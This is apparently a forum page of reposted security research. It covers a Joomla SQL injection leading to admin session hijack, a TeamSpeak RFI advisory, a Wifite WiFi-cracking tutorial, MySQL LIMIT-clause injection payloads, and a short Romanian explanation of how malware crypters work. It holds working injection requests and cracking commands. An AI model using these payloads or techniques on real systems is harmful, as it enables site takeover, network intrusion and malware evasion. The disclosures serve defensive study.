Nytro

Joomla SQL Injection Vulnerability Exploit Results in Full Administrative Access October 22, 2015 Posted By Assi Barak Overview Trustwave SpiderLabs researcher Asaf Orpani has discovered an SQL injection vulnerability in versions 3.2 through 3.4.4 of Joomla, a popular open-source Content Management System (CMS). Joomla had a 6.6 percent share of the market for website CMSs as of October 20, 2015 according to W3Techs—second only to WordPress. Internet services company BuiltWith estimates that as many as 2.8 million websites worldwide use Joomla. CVE-2015-7297, CVE-2015-7857, and CVE-2015-7858 cover the SQL injection vulnerability and various mutations related to it. CVE-2015-7857 enables an unauthorized remote user to gain administrator privileges by hijacking the administrator session. Following exploitation of the vulnerability, the attacker may gain full control of the web site and execute additional attacks. The vulnerability can be exploited in Joomla versions 3.2 (released in November 2013) through version 3.4.4. Because the vulnerability is found in a core module that doesn't require any extensions, all websites that use Joomla versions 3.2 and above are vulnerable. Asaf also uncovered the related vulnerabilities CVE-2015-7858 and CVE-2015-7297 as part of his research. Trustwave SpiderLabs recommends that ALL Joomla users update their Joomla installations to version 3.4.5. Version 3.4.5 is dedicated to fixing this security issue andexpected to be released Thursday, October 22 at approximately 14:00 UTC. Notes For Trustwave Customers and ModSecurity Users Trustwave WAF's "Blind SQL Injection" rule detects this attack provided the rule is enabled. A dedicated, fine-tuned rule will be issued in an upcoming signature update (CorSigs 4.39). If it's enabled, ModSecurity Commercial Rule Set rule 95007 blocks attempts to exploit this vulnerability. For Commercial Rule Set customers, a virtual patch will also be issued soon. Technical Overview We discovered that the following code in /administrator /components /com_contenthistory/ models/history.php is vulnerable to SQL injection: Figure 1: Joomla Core SQL Injection Vulnerable code Several other code elements of Joomla contribute to the exploitation of this vulnerability. They are described in our detailed analysis. The following request is the final blow, as it returns the first active session key from the session table, found in the website database (considering the database Joomla tables name prefix are 'jml_'): Figure 2 : Exploiting the vulnerability to gain the administrator session key Executing this request on the Joomla site returns the following page: Figure 3: Executing the request returns the admin session key Bingo! We've extracted the session ID from the database (we explain how below in our detailed analysis). By pasting the session ID we've extracted—that of an administrator in this case—to the cookie section in the request to access the /administrator/ folder, we're granted administrator privileges and access to the administrator Control Panel: Figure 4: Using the admin key to hijack the session - we are in! TECHNICAL DETAILS The Road to the Joomla Admin Panel Joomla is written in PHP and uses object-oriented programming (OOP) techniques and software design patterns. It stores data in a MySQL, MS SQL, or PostgreSQL database. Joomla's features include page caching, RSS feeds, printable versions of pages, news flashes, blogs, search and support for language internationalization. Joomla is also used for e-commerce via a popular shopping cart template. Virtuemart.com is an e-commerce solution built on Joomla. Because the vulnerability is located in Joomla's core module, e-commerce sites using VirtueMart are also vulnerable to exploit. Figure 7: VirtueMart online shops - Developed over Joomla The Exploit The code vulnerable to SQL injection is found in /administrator/components/com_contenthistory/models/history.php and highlighted below: Figure 8: The code in Joomla vulnerable to SQL Injection ContenthistoryModelHistory represents a model of the content history module. This model is designed to be only for ADMINS USE. How I gained access is another story, but you'll understand by the end of this blog post. The class ContenthistoryModelHistory inherits from JModelList, which is the parent class for all types of models that handle lists of items. Components will usually use different models to serve the specific functioning of the component within the application. This specific one states what it does in its declaration below: Figure 9: Documentation of the vulnerable model 'ContenthistoryModelHistory' To start, I found this piece of code "requiring" a PHP file that contains the content history module controller. The code was located in the administrator folder and, surprisingly, accessible by guests of the website. To execute this code, an attacker only needs to send a request with a parameter stating 'contenthistory' as the component he wants to access. In other words, as a guest I can access this even though it requires a file from JPATH_COMPONENT_ADMINISTRATOR, obviously an item in the admin folder. Any access to the 'admin zone' will always draw a hacker's attention. Figure 10: A 'require_once' of a file located in the Administrator folder In the contenthistory.php file found in the admin components folders, we can see that once contenthistory loads, a controller for the content history module is created allowing us to generate the view we want to see: Figure 11: The file required in figure 10, creating an instance of the content history controller In the first line the code gets an instance of the content history module controller, and then on the second line it calls a function of the controller called execute and a parameter. The execute function leads us closer to our vulnerable model. Below you see the execute function's code: Figure 12: 'execute' function called by the content history controller at figure 11 Remember the parameter task that was passed as an argument to the execute function? Well, if you don't pass any value, the default value is display. That code shows us that the function display is being called in the controller. And here's that function: Figure 13: 'display' function of the content history controller, called in figure 12 In the display function I find a getModel function. Digging further into this function makes me realize that a model is created there according to user-supplied parameters. As you can see at the beginning of the display function, the viewName parameter, which is passed to the getModel function, is coming from user input. So after supplying the component('option') and view parameters in the URL as described in the POC, we've got our hands on the vulnerable model. Since there was arequire_once call to the admins folder where the model is found, it's easy to guide Joomla in creating the desired model, and that model has now been setModel-ed into the configuration. Now that I can control the model the following question arises, can I also force the execution of the vulnerable code with which we started? From personal experience and after researching Joomla, I understood something regarding models in Joomla. Here's the vulnerable code again: Figure 14: The code in Joomla! vulnerable to SQL injection The getListQuery function is an auxiliary function of the model that helps build an SQL query whenever the 'items' of that model need to be retrieved from the database. One objective of the display function is to create the requested page content. The initial assumption of the displaying process is that model 'items' are being retrieved from the database because they are an essential part of the requested page content. That's why the getListQuery function is called as part of this long process. Now that we understand why that function is executed, there is still something that needs explaining. The query is being 'made', and the highlighted area (where we inject SQL) is at the 'SELECT' part of the SQL query. Common sense tells us that this SQL query will be executed later—and so it does when testing the exploit on a test site of Joomla on a local computer. But, what is the expression $this->getState('list.select',…)? And how do we control it? After all, this is a potential place in which to inject the SQL query. First of all, note that the second long parameter in the getState() function is just a 'default value' parameter. This means that if no value is given in 'list.select' then this will be the value. Here you see the getState() function implementation: Figure 15: 'getState' function returning the value injected to the SQL query The return value of the getState() function in our case is the return value of a get()function, returning a value indexed to the configuration entry provided in $propertyparameter, which in our case is 'list.select'. An interesting function populateState() draws my attention because of its name and the fact that it's only called the first time getState() is executed. And here's that populateState() function: Figure 16: 'populateState' function of the ContenthistoryModelHistory model class In examining this flow I see that the setState() function calls, setting different values of entries in the model configuration. Although no control of the state 'list.select' entry is found! This is a bad situation, we need to control it because this is what's injected into the SQL query after all. There's still hope! A call for the parent function of populateState is seen here: Figure 17: 'populateState' function of the JModelList class You'll see the function getUserStateFromRequest(), which stores its return value in the$list variable. GetUserStateFromRequest() is a function that returns the user's input. It takes the variable 'list' passed in the request and treats it as an array, looping on it and dividing it to the array key stored in $name and corresponding value stored in $value. It does some filtering and handling for the keys fullordering, ordering and limit. Those three keys do not relate to our case at all. However, looking at the default case, we can see how simple our attack is going to be! We find that $value is kept as it was as if it's none of the above switch{} cases (fullordering, ordering or limit), and then it sets the state (setState()) of 'list.select' to the value we passed, which means our input is left untouched! And all we've got to do is simply pass the list array in the request with a key name of 'select' and the SQL expression we want to inject! Bravo! We executed a successful SQL injection attack in one of the most-popular web CMS applications out there—Joomla! Now onto doing something interesting with that… SQL INJECTION Proof of Concept Figure 18: The Proof of Concept Finish him! The road from our SQL injection to "game over" is very short. Since our SQL injection exploits a SELECT type of query we will only be able to extract data from the database and not insert any data, which is limiting. After all, not all of the data in the database is interesting. In the users table the password is hashed, and since MD5 can't really be reverted we're kind of stuck. Then, an interesting table in Joomla caught my eye: Figure 19: #__session table in the database I chose the prefix 'jml_' for the tables in the database when I installe Joomla. To my surprise, there is a table called jml_session that handles all live sessions on the website. This means that if an administrator is currently part of a live session, it would be listed. There is also this table: Figure 20: #__user_usergroup_map table in the database An easy way to determine if an admin is logged in is to take the client_id that we extract from jml_session, look for the same user_id in the table jml_user_usergroup_map and check the group id of that user. The number eight, for example, represents a Super User, as shown in this table in the Joomla Administration Panel: Figure 21: User groups list as shown in the Joomla! Administrator Panel Sending a normal request, like we did with the POC, including a parameter "1" in list[select] presents this page in Joomla: (GET index.php?option=com_contenthistory&view=history&list[select]=1) Figure 22: Joomla error page generated when sending the URL above This is weird as all we did is enter 1, so logically it should do SELECT 1 which will always work no matter what the rest of the query is. But, we still get an error of "Unknown colum 'Array'". Hmm, OK… We can't really work like that! We need to know what full query is being executed. In order to know how to work with it, we'll debug our vulnerable code and see what query is generated. This resulted in the following: Figure 23: The SQL query executed when accessing the page mentioned in figure 22 Ok, so the part we inject will be colored in yellow and we notice something else that is quite annoying about the query and will make us have to work harder. But no worries, we like challenges! The query is multi-lined, meaning that we can't just comment it all out. All we can comment is everything after the 'SELECT' word at the first line. Then we need to figure out how to address the other 4 lines. Okay, so that gives us the following issues we have to deal with: The query will only pull data from the table jml_ucm_history (meh…) We have to learn how to get rid of that "ORDER BY Array" or how to make the query according to that. The query will execute ONLY if there will be a row in the database at jml_ucm_history where `ucm_item_id` will be equal to 0 AND `ucm_type_id` will be equal to 0. These seem like some tough and annoying conditions, but we soon find that we can overcome them easily. If you have some experience with SQL injection, you can already solve the first issue. After thinking about it I decided upon an Error-based SQLi! Since we saw that Joomla prints SQL errors on their page, an error-based SQLi will be successful here. We can run multiple queries to cause an error that will extract data from the database. Alright now, about that last line "ORDER BY Array", we have previously gotten an error "Unknown column Array", well, that's the line giving us trouble. Researching the code a little bit more and following the build of the query, I figured out that to address this line you should give another input in the URL which will be a part of our 'list' array. It islist[ordering]= (equals nothing). Setting it equal to nothing will put an order by command as default that will not interrupt our error-based SQLi session. That takes care of the second issue. For last obstacle, the ucm_item_id and ucm_type_id, well, what is it? I checked out the jml_ucm_history table to see: Figure 24: #__ucm_history table in the database There are more columns in the table, but I've only included the relevant ones above. Let's not forget purpose of the component in which we found the injection. It's a content management history component after all—every piece of content that managed or modified in some way is recorded here. Obviously we would have to supply the modified content's ID and type because Joomla needs to know on what content to pull out information. If one of those conditions are false the query will not execute. I found out it's not hard at all to supply correct IDs—it involves some guesswork, but the range is very small (although there is a better solution within the website itself, which we'll cover in a bit). ucm_type_id relates to the item's content type's id, content types usually range from 1-20+ identifying the type of content (e.g., article, gallery, video, etc). ucm_item_id relates to the item's id. For example, a new article is assigned an item id. The range for item ids is small as well because every article you create has its item id incremented from the last content item. The numbering always starts from one, which can be seen from a normal Joomla installation's populated database, or an empty Joomla installation after creating an article or piece of content. After researching the code flow for building the query a little more, we find that to supply both parameters we need to pass the following parameters in the request: type_id – The item's content type ID item_id* – The item's ID Accessing the content component of the Joomla-based website (?option=com_content), would usually give you a list of all contents available on the site. If it doesn't, you can simply look for an article or some gallery found on the website and click on it. Then you'd see you're visiting a URL that looks something like this: Figure 25: The vulnerability security announcement from the official Joomla! Website Here you see a new post released on the Joomla! Website. As I explained above, this means that it must be recorded in the jml_ucm_history table of the database. By examining the URL you can see that the item_id of that post is 5633. Half of our work is done. Guessing the type_id should be easy. We could insert a sleep() function within our SQL injection. That way if we guess the correct item_id and the type_id is true, the loading of the page will be delayed. That solves third and last issue. We know it's not so hard to reach all requirements for the SQL query to work, and we can easily understand by the website's behavior if we're on the right path to full website compromise. Now, let's pull out the first row from the session table just to test using the error-based SQLi discussed earlier. After some attempts to get the query to run we might see this: GET index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1 &list[select]= (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM jml_session LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) The SQL query that will execute would look like this: Figure 26: The SQL query executed when sending the request mentioned above This is the result page we get: Figure 27: Extracting a session key from the DB using the SQL Injection Bingo! We have the session ID we wanted extracted from the database. Using the technique earlier using the jml_user_usergroup_map table, we could target an administrator's session ID. Pasting the session ID we've extracted (which happens to be of an Administrator in our case) to the cookie section in the GET request allows us to access the /administrator/ folder. We've also been granted administrator privileges and access to the administrator panel and a view of the control panel. And that's it—we've compromised the website! Figure 28: Administrator Control Panel in a Joomla-based website Sursa: https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/

Exploit Title: "PwnSpeak" a 0day Exploit for TeamSpeak Client <= 3.0.18.1 RFI/ to RCE Date: 12/10/2015 Author: Scurippio <scurippio@anche.no> /?? (0x6FB30B11 my pgp keyid) Vendor Homepage: https://www.teamspeak.com/ Application: TeamSpeak 3 Version: TeamSpeak3 Client 3.0.0 -?? 3.0.18.1 Platforms: Windows, Mac OS X and Linux Exploitation: Remote Risk : Very High ========= The Bug ========= The bug is a simple but Critical RFI(Remote File Inclusion), and in my test case on "Windows" you can reach remote code execution. By changing the channel description you can insert a bb tag with malicious content. There are a few problems with the image caching on disk. 1: There is no check on file extension. 2: There is no file renaming, and you can fake the extension so you can create in the cache a malicious executable file like hta, scr, msi, pif, vbs etc. ... Link: http://www.securityfocus.com/archive/1/536738

RWSPS: Automated WiFi Cracking [ch4] by rootsh3ll | Oct 18, 2015 Hello and welcome to Chapter 4 of RWSPS. In this chapter we will learn to automate the WiFi hacking using Wifite. We will cover: How to Hack WEP using Wifite How to Hack WPA/2 using Wifite Wifite: Automated Wireless Hacking/Auditing Tool Wifite is a Linux platform tool(comes pre-installed on Kali, Backtrack, Pentoo, BackBox, BlackBuntu and other pentesting distributions ) coded in Python. It is used to automate the hacking process and aims at minimizing the user inputs by scanning and using Python for automation techniques. Wifite is capable of Hacking WEP, WPA/2 and WPS, but not alone. It actually uses tools like aircrack-ng, reaver, Tshark, Cowpatty for various purposes like Enabling monitor mode Scanning air Capturing handshake Validating handshake Cracking key analyzing output and captured packets etc. Before we start the tool, we do need to learn how to install the tool and make it working like a command as it comes in all the pentesting distros. Here are the steps we will be covering in this tutorial. Downloading Wifite Installing Wifite as a system command Cracking WEP using Wifite Cracking WPA/2 using Wifite How to fix WPA/2 handshake capture error in Wifite Focusing Wifite Let’s begin. Downloading Wifite Wifite was previously hosted on code.google.com, but it is now a full-fledged project and hosted on GitHub. For all the latest updates you should go for the GitHub link, that you may find on Search engine’s results. You may directly download it here https://github.com/derv82/wifite Latest version (October, 2015) is r87. Kali Sana includes r87 version by default, but that version has an error that we will see to fix in this tutorial. Installing a tool ( Wifite ) as a command in Linux This is not only limited for this script i.e Wifite, but you can apply this to any working tool/script/program on your Linux platform to make and run it as-a-command. We will use Wifite as an example to do so. We have already downloaded the latest Wifite script and assume that it is stored on our Desktop. Now open terminal and type: cd ~/Desktop “~” reflects the HOME Directory to the shell. Check your home directory by “echo $HOME“. Here $HOME is an environment variable. /Desktop is the directory stored in the HOME directory. unzip wifite*.zip unzip is the tool to extract files from a .zip file. wifite*.zip means any file with starting name wifite and ending with .zip, here “*” means anything (including blank). cd wifite*/ Changes the pointer to first directory starting with name “wifite”. ‘/‘ symbolizes directory. Now you can check that if the script works or not just by typing python wifite.py, as wifite is a python script. If it (or any script) is working fine you might like to make it a system command so that you don’t have to traverse the directory every time. It is pretty better to just open the terminal and type command. For that we should know where the actual executable commands are stored in Linux, so that we can also copy our script in the same directory. Just like in Windows systems, all the CMD commands are stored in \WINDOWS\System32\. type “which“ followed by a simple “linux command“ which ls “which” command tells us the location of the command passed as an argument to it. which is “ls” in this case. It will reflect “/usr/bin/ls” as output. From here we know that ls, executable file is stored in /usr/bin directory. Now, what we have to do is move our wifite script to “/usr/bin/” and make it executable, if not already. Moving wifite.py to /usr/bin/ (we are in ~/Desktop/wifite/) sudo cp wifite.py /usr/bin/wifite sudo stands for SUperuser DO. Used to take root(SuperUser) permission to perform certain tasks. cp is used to copy files, Syntax: cp “Source” “Destination”, where Source is wifite.py and destination is /usr/bin/wifite. Also wifite is the output filename that we would like to use as command. Here rwx stands for Read, Write, Executable. All of them are file attributes. Making wifite Executable(if not already), so that no need to write python before the file name. sudo chmod +x /usr/bin/wifite chmod, changes the file(/usr/bin/wifite) mod to +x, i.e executable. Now wifite is a system command you can open a new terminal and type sudo wifite to run the command with root privilege. Let’s now move on to Cracking. Cracking WEP using Wifite Cracking WEP using any automated tool is hell lot of easy task as you don’t have to analyze anything, just see target, select option and hit [ENTER]. I don’t recommend using any automated tool until you have learned the actual working of the script or the process that runs behind the script. Scripts are only to reduce time and effort. Please don’t rely upon scripts and go ahead and Learn the real process by yourself and use automated tools to save your time. I will show the tutorial on Kali Linux v1 and v2, which comes with pre-installed Wifite. I am running root account by default. If you are running standard account, use sudo before Wifite eg: sudo wifite Open Terminal and type wifite and wait for it to show you the AP List. Press CTRL-C and select desired AP with enc type WEP and type its NUM. like show in the image below. Just wait for Wifite to capture the IVs(Initialization Vector) and crack the key for you. WEP cracking is the easiest of all. that is the one of the reasons that WEP is now depreciated, but still you may find it in many places where people haven’t changed their router from a while. Things to note: Wifite start the cracking after 10K IVs. Around 60K IVs might be required to crack key. Success rate is 99.9%. Make sure capture speed is 100+ IVs/second. After Wifite captures enough IVs to crack the WEP key, it will show you an output similar to this: Note in the image above, total IVs captured are 52,846 with a speed of 857 iv/sec and the Key is cracked. If you have enough IV, your WEP key is going to be broken, regardless of the length, complexity of the key. How to fix it ? use WPA/2. Let’s move on to WPA/2 cracking. Cracking WPA/2 using Wifite Unlike WEP, WPA/2 encryption algorithm is way much stronger and perhaps considered the strongest encryption at this moment. WPA2 encryption algorithm is not really broken but we manipulate the Key authentication mechanism used by WPA2 to discover the key.You can see the detailed working here. Similar to above example. Open terminal and type wifite and select the desired AP(WPA/2 enabled). first few steps may go somewhat like this: We are targeting rootsh3ll, which is WPA2 type. You can also select multiple APs, just by putting commas. example: 4,1,3,2 Here order will follow according to the input, means Wifite will try AP #4 at first place, AP #1 at second place and so on as input is provided. After capturing the handshake Wifite may behave in 2 ways depending on versions (r87 or earlier) version r87: Selects a default dictionary already stored in Kali Linux, Backtrack, eg: r0cky0u.txt, darkc0de.lst etc. In new version default dictionary used is located here: /usr/share/fuzzdb/wordlists-user-passwd/passwds/phpbb.txt version r85 or earlier: Does not use any wordlist until -dict option is provided along with a dictionary file. Example: $ sudo wifite -dict /path/to/dictionary.txt Soon after Wifite(r87) captures handshake you will see a similar option: Here Wifite used a stored dictionary on Kali Linux by itself, No option provided and password was not in the dictionary so Crack attempt failed. That is what usually happens in WPA2 cracking, cracking don’t succeed as there are enormous no. of possibilities for a WPA2 type passwords that lies from 8-63 characters, also which can include Alphabets(a-z, A-z), Number(0-9) and Special characters(!, @, #, $,… etc) But no need to feel low. There are numerous methods also to retrieve WPA2 Passphrase, some of which we will learn in this series. In the above image you can see the path in which Wifite has stored the .cap file i.e /hs/ . You can copy the file and use it for manual brute-forcing. How to fix WPA/2 handshake capture error in Wifite ? If you are a frequent user of Wifite script, you may have encountered an issue related to the handshake capturing part of Wifite. If you are not familiar, then here is the error: Wifite keep on listening the handshake and deauth-ing the connected clients in a loop and not capturing any handshake. Where at the same time if you start airodump-ng in another terminal it will capture the handshakes Wifite is deauth-ing the clients again and again airodump-ng will keep on capturing handshake again and again. So what is the issue ? is it with the script ? Yes, there was an issue in the Wifite script ( r85, 587[old] in which auto-deauth during handshake capture was not guaranteed to deauth as expected intervals resulting in the handshake capture failure. This issue can be fixed in 3 ways: Use airodump-ng to capture files. Use latest version of Wifite Using airodump-ng to fix Wifite Handshake issue This one is very simple. While Wifite is running in background and failing to capture handshake. just open a new Terminal and run airodump-ng followed by the output_filename and Interface BSSID and channel_no. $ sudo airodump-ng wlan1mon -c 11 -w cap_file -b BSSID If there are connected clients, wifite will deauth them and the handshake will be captured by airodump-ng. Then press CTRL-C and have fun with your captured file. BSSID, Channel are very important, as our wireless card can operate at 1 frequency at a moment. Wifite fixes the wireless card on the Channel no.(frequency) similar to the AP’s we are trying to capture handshake of and by default airodump-ng hops between the channels so to avoid the errors we need to tell airodump-ng to fix itself on our desired channel i.e Channel 11 in this case. and also to avoid other AP’s handshake that might be operating on similar channel we use BSSID as a filter. Use latest version of Wifite to fix Handshake capture issue If you are using Kali Linux 1.1.0, BackBox, Ubuntu, Mint etc and facing the issue, you should try updating your Wifite version. You can do it in 2 ways. Use wifite –update command. Didn’t work ? Try downloading manually and running the script. Here is a thing to note while you might be updating using wifite –update command. You might see this output What usually happens is Wifite check for the latest version on GitHub, not by the filesize but by the version i.e r87 which is pre-installed on Kali Linux 2.0. But here’s a catch, if you look at the last update of wifite on GitHub page it was 5 months ago and the version installed in Kali Sana are both same i.e r87 but filesize differs as Kali Sana version of wifite isn’t Fixed but 5 months earlier version is r87 but fixed one. We will check it by downloading the latest wifite script from GitHub and comparing the file size of both scripts. Here is what I got when checking file size of both wifite scripts i.e one downloaded and other pre-installed. both are r87 lets understand the above image in 2 parts Above Yellow Line: ls -lh $(which wifite) ls command is used to list files in a certain directory, -lh are the command line arguments where “l” stands for listing the file details and “h” stands for human readable format for file-size followed by the file-path reflected by which command. $(), this is the bash function used to execute another command within a command, which we used to get the path to installed wifite script. ls -lh ./wifite.py again ls -lh for same purpose but the file is now wifite.py which is stored in current directory i.e ~/Desktop . In Linux world a dot (.) stands for current location, followed by “/” i.e directory. So “./” stands for current directory and./wifite.py is the file-name(wifite.py) in the current directory(./) Now notice the file-size for both, its 158 kiloBytes as Human readable format option is passed to ls command. But if we look it more clearly, means see size in Bytes we will see a change in the size of both files which you can see below the yellow line Below the yellow Line: You are now familiar to the commands used. Let’s jump onto the file-size Latest r87 version: 160949 Bytes Old r87 version: 161323 Bytes This change in the size is due to the edited code. From the older version many lines are edited to fix the Handshake error. According to tests I conducted on Kali Sana, Wifite still didn’t work even after updating it to latest version. Digging deeper I came to know that as Kali Sana was released in August and Wifite was last updated in June. So at that time Wifite was updated for Kali Linux version 1.1.0. and so not working in Kali Sana for now. Soon after finishing this series I will look at the code to fix it to work in Kali Sana. Till then you can use two of the either options to get the work done. Focusing Wifite Focusing Wifite means using wifite’s options to filter the output or the cracking process to save screen clutter, memory, wireless card life and a sometimes headache. For example if we are interested in cracking only WEP type Access points we will use sudo wifite -wep -p0841 -p0841 is the type of attack which I have found most useful and working in most of the cases, so it might be better for you too for using -p0841 when cracking WEP, it will save you a lot of time while capturing IVs. and similarly for WPA/2, lets also tell wifite to use our desired dictionary sudo wifite -wpa -w /media/drive/wordlists/MY_DICT.txt Wifite will now use MY_DICT.txt located in /media/drive/wordlists/ as a wordlist to crack WPA/2 passphrase after capturing handshake. there are many options that you can use Using specific channel Specific BSSID/ESSID Certain attack type for WEP/WPA/2 Setting time limit for WEP/WPA/2 using -wept and -wpat options and many more. Just type: sudo wifite –help For looking up all the options available. Explore the tool and keep learning. Useful Links: Router: TP-LINK TL-MR3420 300 MB/s Wireless Router 2x 5dBi antennas Network Adapters: Alfa AWUSO36NH High Gain B/G/N USB / Alfa AWUS036NHA B/G/N USB High Gain Antenna: Alfa 9dBi WiFi Omni-Directional High-Gain Antenna USB Drive (32 GB): SanDisk Ultra Fit USB 3.0 32GB Pen Drive Sursa: http://www.rootsh3ll.com/2015/10/rwsps-automated-wifi-wep-wpa2-wps-cracking-ch4/

Ti-a scapat

Vezi asta: https://ro.wikipedia.org/wiki/Automat_finit Cat despre "compilare", adica din cod sursa sa faci un executabil... Fa pentru inceput ceva simplu: 1. Creezi un automat finit 2. Procesezi un limbaj simplu Ex. write(123) Creezi o sintaxa bine pusa la punct. Mai exact, iei caracter cu caracter si: a. Ai o litera? Hmm, pare sa fie numele unei functii. Mergi mai departe b. Urmatorul caracter e "("? Inseamna ca s-a terminat numele functiei ("write") si urmeaza un parametru c. Urmatorul caracter e ")"? Inseama ca "123" e parametru pentru "write" Acestea sunt stari. Cele in cerculet sunt stari. Liniile inseamna procesare caracter cu caracter si starea in care se trece. De exemplu, din starea "functie", citesti o litera, te intorci in aceeasi stare si adaugi acea litera la numele functiei. Daca citesti insa caracterul "(" te duci in starea "param" si citesti cifra cu cifra valoarea. E un caz simplu de tot. Trebuie sa iei in considerare orice posibilitate si sa duci in starea de "eroare de compilare" daca ceva nu este in regula. 3. Dupa asta, interpretezi acel limbaj al tau. E frumos ce vrei sa faci dar poate fi complicat. Cauta despre teoria compilatoarelor, sunt multe articole, ce am zis eu e doar o idee, poate sa nu fie cea mai buna. Apoi, daca vrei "exe" trebuie sa transcrii din acel automat finit in limbaj de asamblare. Daca reusesti asta, o sa poti asambla in cod executabil, creezi un fisier PE (Portable Executable, strucutra exe) gol, pui Entrypoint catre o sectiune ".text" (sau ce nume vrei tu) care e "readable and executable" si acolo pui acel cod. Daca ai date, o sa iti trebuiasca o sectiune speciala. E prea complicat. Incearca ceva interpretat simplu, un script ca acel "write(123)". -------------------------------------------------------------------- Acum am vazut ce vrei sa faci de fapt. Un crypter functioneaza asa: 1. Ai un EXE deja creat 2. Pui "la final" sau "la interior" fisierul cryptat 3. Pui niste date de configurare, ca mai sus In acele date de configurare specifici encryptia si poate cheia. Sau ii pui o metoda de a primi cumva, de undeva, cheia de decryptare. Cat despre cum functioneaza un crypter, nu e asa simplu: trebuie sa incarci in memorie un executabil. Insa gasesti mult cod sursa din care poti invata, dar o sa iti ia ceva timp.

Se castiga mai bine pe SAP, sunt mai multe oportunitati pe Java. Alegerea e dificila.

SQL Injections in MySQL LIMIT clause Countless number of articles was written on the exploitation of SQL Injections. This post is dedicated to a very specific situation. When assessing the severity of SQL Injection in certain application, I encountered a problem, which I was not able to solve quickly using web search. It’s about a question if SQL injection vulnerability in the LIMIT clause in MySQL 5.x database is currently exploitable. Example query: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 [/TD] [TD=class: crayon-code]SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT injection_point [/TD] [/TR] [/TABLE] Of course, important is the fact that the above query contains ORDER BY clause. In MySQL we cannot use ORDER BY before UNION. If ORDER BY was not there it would be actually very easy to exploit it simply using just UNION syntax. The problem has appeared at stackoverflow and it was discussed at sla.ckers too. Sorry no results. So let’s look at the syntax of the SELECT in the MySQL 5 documentation [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 [/TD] [TD=class: crayon-code]SELECT [ALL | DISTINCT | DISTINCTROW ] [HIGH_PRIORITY] [sTRAIGHT_JOIN] [sql_SMALL_RESULT] [sql_BIG_RESULT] [sql_BUFFER_RESULT] [sql_CACHE | SQL_NO_CACHE] [sql_CALC_FOUND_ROWS] select_expr [, select_expr ...] [FROM table_references [WHERE where_condition] [GROUP BY {col_name | expr | position} [ASC | DESC], ... [WITH ROLLUP]] [HAVING where_condition] [ORDER BY {col_name | expr | position} [ASC | DESC], ...] [LIMIT {[offset,] row_count | row_count OFFSET offset}] [PROCEDURE procedure_name(argument_list)] [iNTO OUTFILE 'file_name' export_options | INTO DUMPFILE 'file_name' | INTO var_name [, var_name]] [FOR UPDATE | LOCK IN SHARE MODE]] [/TD] [/TR] [/TABLE] After the LIMIT clause may occur following clauses: PROCEDURE and INTO. This INTO clause is not interesting, unless the application uses a database account with permission to write files, which nowadays is rather rare situation in the wild. It turns out that it is possible to solve our problem using PROCEDURE clause. The only stored procedure available by default in MySQL is ANALYSE (see docs). Let’s give it a try: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 4 [/TD] [TD=class: crayon-code]mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1); ERROR 1386 (HY000): Can't use ORDER clause with this procedure [/TD] [/TR] [/TABLE] ANALYSE procedure can also take two parameters: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 [/TD] [TD=class: crayon-code]mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1,1); ERROR 1386 (HY000): Can't use ORDER clause with this procedure [/TD] [/TR] [/TABLE] Does not bode us well. Let’s see whether the parameters of ANALYSE are evaluated. [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 [/TD] [TD=class: crayon-code]mysql> SELECT field from table where id > 0 order by id LIMIT 1,1 procedure analyse((select IF(MID(version(),1,1) LIKE 5, sleep(5),1)),1); [/TD] [/TR] [/TABLE] gives us immediate response: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 [/TD] [TD=class: crayon-code]ERROR 1108 (HY000): Incorrect parameters to procedure 'analyse’ [/TD] [/TR] [/TABLE] Therefore, sleep() is certainly not being called. I didn’t give up so fast and I finally found the vector: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 [/TD] [TD=class: crayon-code]mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1); ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1' [/TD] [/TR] [/TABLE] Voilà! The above solution is based on handy known technique of so-called error based injection. If, therefore, our vulnerable web application discloses the errors of the database engine (this is a real chance, such bad practices are common), we solve the problem. What if our target doesn’t display errors? Are we still able to exploit it successfully? It turns out that we can combine the above method with another well-known technique – time based injection. In this case, our solution will be as follows: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 [/TD] [TD=class: crayon-code]SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1) [/TD] [/TR] [/TABLE] It works. What is interesting that using SLEEP is not possible in this case. That’s why there must be a BENCHMARK instead. Update: As BigBear pointed out in the comment, very similar solution was actually posted earlier on rdot. Thanks! Update: It would be awesome if this technique is implemented in sqlmap. Sursa: https://rateip.com/blog/sql-injections-in-mysql-limit-clause/

Junior developer - 750 EUR, minim? Da, nu stiu ce sa zic.

Amuzant, haha, MUIE steaua! PS: Degeaba ascunzi IP in browser cand te conectezi pe 3306 cu IP real...

Macar de ai pune un titlu mai academic.

